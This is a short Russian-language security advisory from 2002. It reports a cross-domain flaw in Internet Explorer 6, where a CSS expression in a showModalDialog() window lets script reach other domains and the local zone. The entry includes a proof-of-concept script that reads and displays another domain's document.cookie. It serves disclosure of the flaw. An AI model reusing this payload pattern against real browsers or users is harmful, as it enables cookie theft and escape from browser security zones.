Дата публикации: | 04.12.2002 |
Всего просмотров: | 1096 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | По сообщениям, сценарий может обратиться к данным других доменов, в том числе и к “Local computer zone” когда назначается стиль текста в окне (окно "ModalDialog") открытым "showModalDialog()". Пример:
<SCRIPT> showModalDialog("http://www1.xakep.ru",null, "font-size:expression(window.execScript( unescape('alert%28%22Domain%3A%22+document.domain +%22%5CnCookie%3A%22+ document.cookie%29%3Bwindow.close%28%29%3B')))"); </SCRIPT>уязвимость проверена в Internet Explorer 6.0 (IEXPLORE.EXE file version: 6.0.2600.0000, MSHTML.DLL file version: 6.00.2600.0000) |
Ссылки: | Poisonous Style for Dialog window turns the zone off. |